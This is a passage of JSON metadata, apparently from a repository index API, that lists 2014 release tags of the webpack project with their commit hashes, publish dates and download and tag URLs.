pack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1